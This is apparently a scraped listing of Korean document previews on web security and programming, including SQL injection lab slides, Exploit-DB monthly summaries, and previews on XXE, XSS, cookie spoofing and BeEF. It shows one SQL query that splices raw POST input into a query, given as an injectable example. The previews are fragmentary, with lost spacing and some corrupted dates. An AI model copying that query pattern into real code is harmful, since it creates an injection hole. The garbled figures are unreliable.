PowerPoint Template 설치및실행방법 Jaewoo Shim Jun. 4. 2018 Contents SQL 인젝션이란 WebGoat 설치방법 실습 과제 2 SQL 인젝션이란 데이터베이스와연동된웹서버에입력값을전달시악의적동작을수행하는쿼리문을삽입하여공격을수행 SELECT * FROM users WHERE id= $_POST[ id ] AND pw= $_POST[ pw ] Internet

More information

PowerPoint Template

PowerPoint Template JavaScript 회원정보 입력양식만들기 HTML & JavaScript Contents 1. Form 객체 2. 일반적인입력양식 3. 선택입력양식 4. 회원정보입력양식만들기 2 Form 객체 Form 객체 입력양식의틀이되는 태그에접근할수있도록지원 Document 객체의하위에위치 속성들은모두 태그의속성들의정보에관련된것

More information

슬라이드 1

슬라이드 1 QR 코드를통한간편로그인 2018. 11. 7 지도교수 : 이병천교수님 4 조 Security-M 지승우이승용박종범백진이 목 차 조원편성 주제선정 비밀번호가뭐였지? 이런일없이조금더쉽게로그인할수있는방법은없을까? 주제선정 ID와패스워드에의한로그인방식의획기적인변화필요 문자형 ID와패스워드 QR Code 등활용 간편한타겟인식및암기식보안체계의불편극복 인증방식의간소화로다양한분야에서활용가능

More information

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름 EDB 분석보고서 (016.01) 016.01.01~016.01.31 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 016 년 1 월에공개된 Exploit-DB 의분석결과, SQL Injection 공격에대한취약점보고개수가가장많았습니다. 분석된 SQL Injection

More information

Windows 8에서 BioStar 1 설치하기

Windows 8에서 BioStar 1 설치하기 / 콘텐츠 테이블... PC에 BioStar 1 설치 방법... Microsoft SQL Server 2012 Express 설치하기... Running SQL 2012 Express Studio... DBSetup.exe 설정하기... BioStar 서버와 클라이언트 시작하기... 1 1 2 2 6 7 1/11 BioStar 1, Windows 8 BioStar

More information

Microsoft PowerPoint - web-part03-ch19-node.js기본.pptx

Microsoft PowerPoint - web-part03-ch19-node.js기본.pptx 과목명: 웹프로그래밍응용 교재: 모던웹을 위한 JavaScript Jquery 입문, 한빛미디어 Part3. Ajax Ch19. node.js 기본 2014년 1학기 Professor Seung-Hoon Choi 19 node.js 기본 이 책에서는 서버 구현 시 node.js 를 사용함 자바스크립트로 서버를 개발 다른서버구현기술 ASP.NET, ASP.NET

More information

Observational Determinism for Concurrent Program Security

Observational Determinism for  Concurrent Program Security 웹응용프로그램보안취약성 분석기구현 소프트웨어무결점센터 Workshop 2010. 8. 25 한국항공대학교, 안준선 1 소개 관련연구 Outline Input Validation Vulnerability 연구내용 Abstract Domain for Input Validation Implementation of Vulnerability Analyzer 기존연구

More information

다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) <% RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp");

다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) <% RequestDispatcher dispatcher = request.getrequestdispatcher( 실행할페이지.jsp); 다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp"); dispatcher.forward(request, response); - 위의예에서와같이 RequestDispatcher

More information

Microsoft PowerPoint - web-part03-ch20-XMLHttpRequest기본.pptx

Microsoft PowerPoint - web-part03-ch20-XMLHttpRequest기본.pptx 과목명 : 웹프로그래밍응용교재 : 모던웹을위한 JavaScript Jquery 입문, 한빛미디어 Part3. Ajax Ch20. XMLHttpRequest 2014년 1학기 Professor Seung-Hoon Choi 20 XMLHttpRequest XMLHttpRequest 객체 자바스크립트로 Ajax를이용할때사용하는객체 간단하게 xhr 이라고도부름 서버

More information

76 XSS 하 Huge-IT Slider admin.php XSS

76 XSS 하 Huge-IT Slider admin.php XSS 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) EDB 분석보고서 (05.06) 05.06.0~05.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 05 년 6 월에공개된 Exploit-DB 의분석결과, LFI 공격에대한보고개수가가장많았습니다. LFI 공격은대체적으로공격난이도는낮지만공격이성공했을경우시스템의주요파일들이노출되거나파일다운로드가가능해지기때문에위험도가높은공격으로분류됩니다.

More information

Web Scraper in 30 Minutes 강철

Web Scraper in 30 Minutes 강철 Web Scraper in 30 Minutes 강철 발표자 소개 KAIST 전산학과 2015년부터 G사에서 일합니다. 에서 대한민국 정치의 모든 것을 개발하고 있습니다. 목표 웹 스크래퍼를 프레임웍 없이 처음부터 작성해 본다. 목표 웹 스크래퍼를 프레임웍 없이 처음부터 작성해 본다. 스크래퍼/크롤러의 작동 원리를 이해한다. 목표

More information

EDB 분석보고서 (06.03) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 File Upload 하 C

EDB 분석보고서 (06.03) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 File Upload 하 C EDB 분석보고서 (06.03) 06.03.0~06.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 06 년 3 월에공개된 Exploit-DB 의분석결과, Local File Inclusion 공격에대한보고개수가가장많았습니다. Local File Inclusion

More information

EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 SQL Injection 중상 Absolu

EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB(  에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 SQL Injection 중상 Absolu EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 0 년 월에공개된 Exploit-DB 의분석결과, 잘알려진웹공격인 SQL Injection 과 XSS(Cross Site Scripting) 공격에대한보고가가장많았습니다.

More information

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환 취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit 2012-07-19 RedAlert Team 안상환 목 차 1. 개요... 1 1.1. 취약점분석추진배경... 1 2. Simple Web Server 취약점... 2 2.1. Simple Web Server 취약점개요... 2 2.2. Simple

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Web server porting 2 Jo, Heeseung Web 을이용한 LED 제어 Web 을이용한 LED 제어프로그램 web 에서데이터를전송받아타겟보드의 LED 를조작하는프로그램을작성하기위해다음과같은소스파일을생성 2 Web 을이용한 LED 제어 LED 제어프로그램작성 8bitled.html 파일을작성 root@ubuntu:/working/web# vi

More information

2009년 상반기 사업계획

2009년 상반기 사업계획 웹 (WWW) 쉽게배우는데이터통신과컴퓨터네트워크 학습목표 웹서비스를위한클라이언트 - 서버구조를살펴본다. 웹서비스를지원하는 APM(Apache, PHP, MySQL) 의연동방식을이해한다. HTML 이지원하는기본태그명령어와프레임구조를이해한다. HTTP 의요청 / 응답메시지의구조와동작원리를이해한다. CGI 의원리를이해하고 FORM 태그로사용자입력을처리하는방식을알아본다.

More information

0. 들어가기 전

0. 들어가기 전 컴퓨터네트워크 14 장. 웹 (WWW) (3) - HTTP 1 이번시간의학습목표 HTTP 의요청 / 응답메시지의구조와동작원리이해 2 요청과응답 (1) HTTP (HyperText Transfer Protocol) 웹브라우저는 URL 을이용원하는자원표현 HTTP 메소드 (method) 를이용하여데이터를요청 (GET) 하거나, 회신 (POST) 요청과응답 요청

More information

<4D6963726F736F667420576F7264202D2033BFF920BECBBEE0BFF9B0A3BAB8B0EDBCAD2E646F6378>

<4D6963726F736F667420576F7264202D2033BFF920BECBBEE0BFF9B0A3BAB8B0EDBCAD2E646F6378> 목차 Part Ⅰ. 2 월의 악성코드 통계 1. 악성코드 통계... 2 (1) 감염 악성코드 Top 15... 2 (2) 카테고리별 악성코드 유형... 3 (3) 카테고리별 악성코드 비율 전월 비교... 3 (4) 월별 피해 신고 추이... 4 (5) 월별 악성코드 DB 등록 추이... 4 2. 악성코드 이슈 분석 악성코드 종합 선물셋트 Bredolab Worm...

More information

PowerPoint Presentation

PowerPoint Presentation WordPress 를이용한웹사이트만들기 2015 년 한지웅 WordPress 를이용한웹사이트만들기 Day 1 Day 2 Day 3 Day 4 Day 5 1. 웹사이트제작기초 HTLM 기본 CSS 기본 WordPress 개론 ( 웹사이트구축툴 ) 2. 웹호스팅 / 웹사이트구축 웹호스팅업체선택 cpanel 설정 WordPress 설치 3. WordPress 기초활용

More information

품질검증분야 Stack 통합 Test 결과보고서 [ The Bug Genie ]

품질검증분야 Stack 통합 Test 결과보고서 [ The Bug Genie ] 품질검증분야 Stack 통합 Test 결과보고서 [ The Bug Genie ] 2014. 10. 목 차 I. Stack 통합테스트개요 1 1. 목적 1 II. 테스트대상소개 2 1. The Bug Genie 소개 2 2. The Bug Genie 주요기능 3 3. The Bug Genie 시스템요구사항및주의사항 5 III. Stack 통합테스트 7 1. 테스트환경

More information

Analytics > Log & Crash Search > Unity ios SDK [Deprecated] Log & Crash Unity ios SDK. TOAST SDK. Log & Crash Unity SDK Log & Crash Search. Log & Cras

Analytics > Log & Crash Search > Unity ios SDK [Deprecated] Log & Crash Unity ios SDK. TOAST SDK. Log & Crash Unity SDK Log & Crash Search. Log & Cras Analytics > Log & Crash Search > Unity ios SDK [Deprecated] Log & Crash Unity ios SDK. TOAST SDK. Log & Crash Unity SDK Log & Crash Search. Log & Crash Unity SDK... Log & Crash Search. - Unity3D v4.0 ios

More information

로거 자료실

로거 자료실 redirection 매뉴얼 ( 개발자용 ) V1.5 Copyright 2002-2014 BizSpring Inc. All Rights Reserved. 본문서에대한저작권은 비즈스프링 에있습니다. - 1 - 목차 01 HTTP 표준 redirect 사용... 3 1.1 HTTP 표준 redirect 예시... 3 1.2 redirect 현상이여러번일어날경우예시...

More information

제이쿼리 (JQuery) 정의 자바스크립트함수를쉽게사용하기위해만든자바스크립트라이브러리. 웹페이지를즉석에서변경하는기능에특화된자바스크립트라이브러리. 사용법 $( 제이쿼리객체 ) 혹은 $( 엘리먼트 ) 참고 ) $() 이기호를제이쿼리래퍼라고한다. 즉, 제이쿼리를호출하는기호

제이쿼리 (JQuery) 정의 자바스크립트함수를쉽게사용하기위해만든자바스크립트라이브러리. 웹페이지를즉석에서변경하는기능에특화된자바스크립트라이브러리. 사용법 $( 제이쿼리객체 ) 혹은 $( 엘리먼트 ) 참고 ) $() 이기호를제이쿼리래퍼라고한다. 즉, 제이쿼리를호출하는기호 제이쿼리 () 정의 자바스크립트함수를쉽게사용하기위해만든자바스크립트라이브러리. 웹페이지를즉석에서변경하는기능에특화된자바스크립트라이브러리. 사용법 $( 제이쿼리객체 ) 혹은 $( 엘리먼트 ) 참고 ) $() 이기호를제이쿼리래퍼라고한다. 즉, 제이쿼리를호출하는기호 CSS와마찬가지로, 문서에존재하는여러엘리먼트를접근할수있다. 엘리먼트접근방법 $( 엘리먼트 ) : 일반적인접근방법

More information

bn2019_2

bn2019_2 arp -a Packet Logging/Editing Decode Buffer Capture Driver Logging: permanent storage of packets for offline analysis Decode: packets must be decoded to human readable form. Buffer: packets must temporarily

More information

Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc

Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc 분석보고서 이동현 (dhclub20@naver.com) SK Infosec Co., Inc MSS 사업본부침해대응팀모의해킹파트 Table of Contents 1. 개요... 3 1.1. 배경... 3 1.2. 목적... 3 2. 공격분석... 4 2.1. Cookie Injection... 4 2.2. Cookie Injection의발생원인... 5 2.3.

More information

기술문서 작성 XXE Attacks 작성자 : 인천대학교 OneScore 김영성 I. 소개 2 II. 본문 2 가. XML external entities 2 나. XXE Attack 3 다. 점검방법 3 라.

기술문서 작성 XXE Attacks 작성자 : 인천대학교 OneScore 김영성 I. 소개 2 II. 본문 2 가. XML external entities 2 나. XXE Attack 3 다. 점검방법 3 라. 기술문서 14. 11. 10. 작성 XXE Attacks 작성자 : 인천대학교 OneScore 김영성 dokymania@naver.com I. 소개 2 II. 본문 2 가. XML external entities 2 나. XXE Attack 3 다. 점검방법 3 라. Exploit 5 마. 피해 6 III. 결론 6 가. 권고사항 6 I. 소개 가. 역자 본문서는

More information

Microsoft PowerPoint - 04-UDP Programming.ppt

Microsoft PowerPoint - 04-UDP Programming.ppt Chapter 4. UDP Dongwon Jeong djeong@kunsan.ac.kr http://ist.kunsan.ac.kr/ Dept. of Informatics & Statistics 목차 UDP 1 1 UDP 개념 자바 UDP 프로그램작성 클라이언트와서버모두 DatagramSocket 클래스로생성 상호간통신은 DatagramPacket 클래스를이용하여

More information

AhnLab_template

AhnLab_template 해킹과침해대응 웹해킹과대응 2013. 10. 17 ( 목 ) 안랩 ASEC 대응팀문영조 Contents 01 웹해킹과취약점 02 웹해킹기법에대한이해 03 웹해킹과침해대응 04 결론 01 웹해킹과취약점 개요 01. 웹해킹과취약점 < 출처 - IBM X-Force 2012 Annual Trend & Risk Report> 4 개요 01. 웹해킹과취약점 웹해킹 (Web

More information

Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 11 년 10 월 26 일수요일

Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 11 년 10 월 26 일수요일 Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 Introduce Me!!! Job Jeju National University Student Ubuntu Korean Jeju Community Owner E-Mail: ned3y2k@hanmail.net Blog: http://ned3y2k.wo.tc Facebook: http://www.facebook.com/gyeongdae

More information

EDB 분석보고서 (04.09) ~ Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다 SQL Injection Like Dislike Counter..3 Plugin - ajax_coun

EDB 분석보고서 (04.09) ~ Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다 SQL Injection Like Dislike Counter..3 Plugin - ajax_coun EDB 분석보고서 (04.09) 04.09.0~04.09.30 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04 년 09 월에공개된 Exploit-DB 의분석결과, Cross Site Scripting 공격에대한취약점보고개수가가장많았습니다. 분석된 Cross

More information

ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O

ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O Orange for ORACLE V4.0 Installation Guide ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE...1 1....2 1.1...2 1.2...2 1.2.1...2 1.2.2 (Online Upgrade)...11 1.3 ORANGE CONFIGURATION ADMIN...12 1.3.1 Orange Configuration

More information

SRC PLUS 제어기 MANUAL

SRC PLUS 제어기 MANUAL ,,,, DE FIN E I N T R E A L L O C E N D SU B E N D S U B M O TIO

More information

1217 WebTrafMon II

1217 WebTrafMon II (1/28) (2/28) (10 Mbps ) Video, Audio. (3/28) 10 ~ 15 ( : telnet, ftp ),, (4/28) UDP/TCP (5/28) centralized environment packet header information analysis network traffic data, capture presentation network

More information

SKINFOSEC-CHR-028-ASP Mssql Cookie Sql Injection Tool 분석 보고서.doc

SKINFOSEC-CHR-028-ASP Mssql Cookie Sql Injection Tool 분석 보고서.doc Asp Mssql Sql Injection Tool 분석보고서 이재곤 (x0saver@gmail.com) SK Infosec Co., Inc MSS 사업본부 / 침해대응센터모의해킹파트 Table of Contents 1. 개요... 3 2. 구성... 3 3. 분석... 4 3.1. 기능분석... 4 4. 공격원리...14 4.1 기본공격원리...14 4.2

More information

HTML5가 웹 환경에 미치는 영향 고 있어 웹 플랫폼 환경과는 차이가 있다. HTML5는 기존 HTML 기반 웹 브라우저와의 호환성을 유지하면서도, 구조적인 마크업(mark-up) 및 편리한 웹 폼(web form) 기능을 제공하고, 리치웹 애플리케이 션(RIA)을

HTML5가 웹 환경에 미치는 영향 고 있어 웹 플랫폼 환경과는 차이가 있다. HTML5는 기존 HTML 기반 웹 브라우저와의 호환성을 유지하면서도, 구조적인 마크업(mark-up) 및 편리한 웹 폼(web form) 기능을 제공하고, 리치웹 애플리케이 션(RIA)을 동 향 제 23 권 5호 통권 504호 HTML5가 웹 환경에 미치는 영향 이 은 민 * 16) 1. 개 요 구글(Google)은 2010년 5월 구글 I/O 개발자 컨퍼런스에서 HTML5를 통해 플러 그인의 사용이 줄어들고 프로그램 다운로드 및 설치가 필요 없는 브라우저 기반 웹 플랫폼 환경이 점차 구현되고 있다고 강조했다. 그리고 애플(Apple)은 2010년

More information

<4D6963726F736F667420506F776572506F696E74202D2030342E20C0CEC5CDB3DD20C0C0BFEB20B9D720BCADBAF1BDBA20B1E2BCFA2831292E70707478>

<4D6963726F736F667420506F776572506F696E74202D2030342E20C0CEC5CDB3DD20C0C0BFEB20B9D720BCADBAF1BDBA20B1E2BCFA2831292E70707478> 웹과 인터넷 활용 및실습 () (Part I) 문양세 강원대학교 IT대학 컴퓨터과학전공 강의 내용 전자우편(e-mail) 인스턴트 메신저(instant messenger) FTP (file transfer protocol) WWW (world wide web) 인터넷 검색 홈네트워크 (home network) Web 2.0 개인 미니홈페이지 블로그 (blog)

More information

커알못의 커널 탐방기 이 세상의 모든 커알못을 위해서

커알못의 커널 탐방기 이 세상의 모든 커알못을 위해서 커알못의 커널 탐방기 2015.12 이 세상의 모든 커알못을 위해서 개정 이력 버전/릴리스 0.1 작성일자 2015년 11월 30일 개요 최초 작성 0.2 2015년 12월 1일 보고서 구성 순서 변경 0.3 2015년 12월 3일 오탈자 수정 및 글자 교정 1.0 2015년 12월 7일 내용 추가 1.1 2015년 12월 10일 POC 코드 삽입 및 코드

More information

Javascript.pages

Javascript.pages JQuery jquery part1 JavaScript : e-mail:leseraphina@naver.com http://www.webhard.co.kr I.? 2 ......,,. : : html5 ; ; .

More information

Microsoft Word - CrossSiteScripting[XSS].docx

Microsoft Word - CrossSiteScripting[XSS].docx 1 Education Giehong.E goodbyestar@nate.com abstract - 영리를목적으로한곳에서의불법적인배포는금지합니다. - 문서의내용은임의의가상테스트를대상으로한 OWASP10 의기본적인내용들이며교육을위해만들어진문서입니다. - 비인가받은악의적인행동은불법이며법적책임또한당사자에게있습니다 Copyright@2008 All Rights Reserved

More information

초보자를 위한 ASP.NET 2.0

초보자를 위한 ASP.NET 2.0 (World Wide Web), HTML., (ebay) (Amazon.com) HTML,., Microsoft ASP.NET. ASP.NET ASP.NET., ASP.NET HTML,,. ASP.NET HTML.. ASP.NET, Microsoft Visual Basic. Visual Basic. 5 Visual Basic, Visual Basic. ASP.NET

More information

rmi_박준용_final.PDF

rmi_박준용_final.PDF (RMI) - JSTORM http://wwwjstormpekr (RMI)- Document title: Document file name: Revision number: Issued by: Document Information (RMI)- rmi finaldoc Issue Date: Status:

More information

36802 Tune Library / 중 NEX-Forms < admin-ajax.php 하 중 Ultimate Product Catalogue - / 하 중 Ultimate Product Catalogue - ad

36802 Tune Library / 중 NEX-Forms < admin-ajax.php 하 중 Ultimate Product Catalogue - / 하 중 Ultimate Product Catalogue - ad 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) EDB 분석보고서 (205.04) 205.04.0~205.04.30 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 205 년 4 월에공개된 Exploit-DB 의분석결과, 공격에대한보고개수가가장많았습니다. 대부분의 공격이 CMS 에서발견되습니다. CMS 에서는

More information

untitled

untitled Push... 2 Push... 4 Push... 5 Push... 13 Push... 15 1 FORCS Co., LTD A Leader of Enterprise e-business Solution Push (Daemon ), Push Push Observer. Push., Observer. Session. Thread Thread. Observer ID.

More information

FileMaker 15 WebDirect 설명서

FileMaker 15 WebDirect 설명서 FileMaker 15 WebDirect 2013-2016 FileMaker, Inc.. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker FileMaker Go FileMaker, Inc.. FileMaker WebDirect FileMaker, Inc... FileMaker.

More information

0125_ 워크샵 발표자료_완성.key

0125_ 워크샵 발표자료_완성.key WordPress is a free and open-source content management system (CMS) based on PHP and MySQL. WordPress is installed on a web server, which either is part of an Internet hosting service or is a network host

More information

8 장데이터베이스 8.1 기본개념 - 데이터베이스 : 데이터를조직적으로구조화한집합 (cf. 엑셀파일 ) - 테이블 : 데이터의기록형식 (cf. 엑셀시트의첫줄 ) - 필드 : 같은종류의데이터 (cf. 엑셀시트의각칸 ) - 레코드 : 데이터내용 (cf. 엑셀시트의한줄 )

8 장데이터베이스 8.1 기본개념 - 데이터베이스 : 데이터를조직적으로구조화한집합 (cf. 엑셀파일 ) - 테이블 : 데이터의기록형식 (cf. 엑셀시트의첫줄 ) - 필드 : 같은종류의데이터 (cf. 엑셀시트의각칸 ) - 레코드 : 데이터내용 (cf. 엑셀시트의한줄 ) 8 장데이터베이스 8.1 기본개념 - 데이터베이스 : 데이터를조직적으로구조화한집합 (cf. 엑셀파일 ) - 테이블 : 데이터의기록형식 (cf. 엑셀시트의첫줄 ) - 필드 : 같은종류의데이터 (cf. 엑셀시트의각칸 ) - 레코드 : 데이터내용 (cf. 엑셀시트의한줄 ) - DDL(Data Definition Language) : show, create, drop

More information

Dialog Box 실행파일을 Web에 포함시키는 방법

Dialog Box 실행파일을 Web에 포함시키는 방법 DialogBox Web 1 Dialog Box Web 1 MFC ActiveX ControlWizard workspace 2 insert, ID 3 class 4 CDialogCtrl Class 5 classwizard OnCreate Create 6 ActiveX OCX 7 html 1 MFC ActiveX ControlWizard workspace New

More information

untitled

untitled Oracle DBMS 로그인의접근제어우회 취약점분석 2006. 2. 9 인터넷침해사고대응지원센터 (KISC) 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 룰명시하여주시기바랍니다. 개요 o 2005년이후 Oracle Critical Patch Update(CPU) 는 Oracle사제품대상으로다수의보안패치및보안패치와관련된일반패치를발표하는주요수단임

More information

14-Servlet

14-Servlet JAVA Programming Language Servlet (GenericServlet) HTTP (HttpServlet) 2 (1)? CGI 3 (2) http://jakarta.apache.org JSDK(Java Servlet Development Kit) 4 (3) CGI CGI(Common Gateway Interface) /,,, Client Server

More information

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D313939392D382E687770>

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D313939392D382E687770> i ii iii iv v vi 1 2 3 4 가상대학 시스템의 국내외 현황 조사 가상대학 플랫폼 개발 이상적인 가상대학시스템의 미래상 제안 5 웹-기반 가상대학 시스템 전통적인 교수 방법 시간/공간 제약을 극복한 학습동기 부여 교수의 일방적인 내용전달 교수와 학생간의 상호작용 동료 학생들 간의 상호작용 가상대학 운영 공지사항,강의록 자료실, 메모 질의응답,

More information

BEef 사용법.pages

BEef 사용법.pages 1.... 3 2.... 3 (1)... 3 (2)... 5 3. BeEF... 7 (1) BeEF... 7 (2)... 8 (3) (Google Phishing)... 10 4. ( )... 13 (1)... 14 (2) Social Engineering... 17 (3)... 19 (4)... 21 5.... 22 (1)... 22 (2)... 27 (3)

More information

SMB_ICMP_UDP(huichang).PDF

SMB_ICMP_UDP(huichang).PDF SMB(Server Message Block) UDP(User Datagram Protocol) ICMP(Internet Control Message Protocol) SMB (Server Message Block) SMB? : Microsoft IBM, Intel,. Unix NFS. SMB client/server. Client server request

More information

HLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 :

HLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 : HLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 : ios 3.0 이상 - 콘텐츠형식 : MP4 (H264,AAC ), MP3 * 디바이스별해상도,

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 HTML5 웹프로그래밍입문 부록. 웹서버구축하기 1 목차 A.1 웹서버시스템 A.2 PHP 사용하기 A.3 데이터베이스연결하기 2 A.1 웹서버시스템 3 웹서버의구축 웹서버컴퓨터구축 웹서버소프트웨어설치및실행 아파치 (Apache) 웹서버가대표적 서버실행프로그램 HTML5 폼을전달받아처리 PHP, JSP, Python 등 데이터베이스시스템 서버측에데이터를저장및효율적관리

More information

ÀÎÅÍ³Ý ÁøÈï¿ø 5¿ù

ÀÎÅÍ³Ý ÁøÈï¿ø 5¿ù 21 5 Korea Internet & Security Agency CONTENTS 2 3 3 3 4 4 5 6 6 7 7 8 11 12 14 14 15 15 16 18 2 22 23 24 24 32 35 36 2 215 Bot 1,7511,315 33.2% 1,621,468 27.7% 285 431 33.9% 295 12 6.9% 44 396 2.% 132

More information

Cookie Spoofing.hwp

Cookie Spoofing.hwp Cookie Spoofing&Sniffing By Maxoverpro[max]( 장상근) maxoverpro@empal.com http://www.maxoverpro.org 1. 서론 이문서는 Cookie Spoofing 과 Sniffing 에대해정석적인방법을이야기하도록하며또 한어느특정곳의취약점을설명하지않고직접제작한예제를가지고 Cookie Spoofing 과

More information

C# Programming Guide - Types

C# Programming Guide - Types C# Programming Guide - Types 최도경 lifeisforu@wemade.com 이문서는 MSDN 의 Types 를요약하고보충한것입니다. http://msdn.microsoft.com/enus/library/ms173104(v=vs.100).aspx Types, Variables, and Values C# 은 type 에민감한언어이다. 모든

More information

2파트-07

2파트-07 CHAPTER 07 Ajax ( ) (Silverlight) Ajax RIA(Rich Internet Application) Firefox 4 Ajax MVC Ajax ActionResult Ajax jquery Ajax HTML (Partial View) 7 3 GetOrganized Ajax GetOrganized Ajax HTTP POST 154 CHAPTER

More information

목 차 1. 개 요... 1 1.1. 배경... 1 1.2. 요약... 1 1.3. 정보... 2 1.4. 대상시스템... 2 1.5. 원리... 2 2. 공격 기법 및 기본 개념... 3 2.1. Heap Spray... 3 2.2. Font... 4 3. 공 격..

목 차 1. 개 요... 1 1.1. 배경... 1 1.2. 요약... 1 1.3. 정보... 2 1.4. 대상시스템... 2 1.5. 원리... 2 2. 공격 기법 및 기본 개념... 3 2.1. Heap Spray... 3 2.2. Font... 4 3. 공 격.. 취약점 분석 보고서 [ Adobe Flash Player 11.3 Kern Table Parsing Integer Overflow - CVE-2012-1535 ] 2012-08-23 RedAlert Team 안상환 목 차 1. 개 요... 1 1.1. 배경... 1 1.2. 요약... 1 1.3. 정보... 2 1.4. 대상시스템... 2 1.5. 원리...

More information

var answer = confirm(" 확인이나취소를누르세요."); // 확인창은사용자의의사를묻는데사용합니다. if(answer == true){ document.write(" 확인을눌렀습니다."); else { document.write(" 취소를눌렀습니다.");

var answer = confirm( 확인이나취소를누르세요.); // 확인창은사용자의의사를묻는데사용합니다. if(answer == true){ document.write( 확인을눌렀습니다.); else { document.write( 취소를눌렀습니다.); 자바스크립트 (JavaScript) - HTML 은사용자에게인터페이스 (interface) 를제공하는언어 - 자바스크립트는서버로데이터를전송하지않고서할수있는데이터처리를수행한다. - 자바스크립트는 HTML 나 JSP 에서작성할수있고 ( 내부스크립트 ), 별도의파일로도작성이가능하다 ( 외 부스크립트 ). - 내부스크립트 - 외부스크립트

More information

(Microsoft Word - \301\266\301\326\272\300_XSS.docx)

(Microsoft Word - \301\266\301\326\272\300_XSS.docx) XSS(Cross Site Scripting) 1. XSS 란무엇인가 XSS 란 Cross Site Scripting 의약자 (CSS 라고도불리기도하나 Cascading Style Sheets 와혼용되어일반적으로 XSS 를많이사용한다.) 로 Web 보안취약점중하나이다. 이러한 XSS 는인터넷이생겨나고활성화되기전, 홈페이지소개및단지정보를제공하는정적인페이지에서인터넷이활성화된현재,

More information

Microsoft PowerPoint 세션.ppt

Microsoft PowerPoint 세션.ppt 웹프로그래밍 () 2006 년봄학기 문양세강원대학교컴퓨터과학과 세션변수 (Session Variable) (1/2) 쇼핑몰장바구니 장바구니에서는사용자가페이지를이동하더라도장바구니의구매물품리스트의내용을유지하고있어야함 PHP 에서사용하는일반적인변수는스크립트의수행이끝나면모두없어지기때문에페이지이동시변수의값을유지할수없음 이러한문제점을해결하기위해서 PHP 에서는세션 (session)

More information

untitled

untitled A Leader of Enterprise e-business Solution FORCS Co., LTD 1 OZ Application Getting Started 2 FORCS Co., LTD A Leader of Enterprise e-business Solution FORCS Co., LTD 3 OZ Application Getting Started 'OZ

More information

Microsoft PowerPoint - 웹프로그래밍_ ppt [호환 모드]

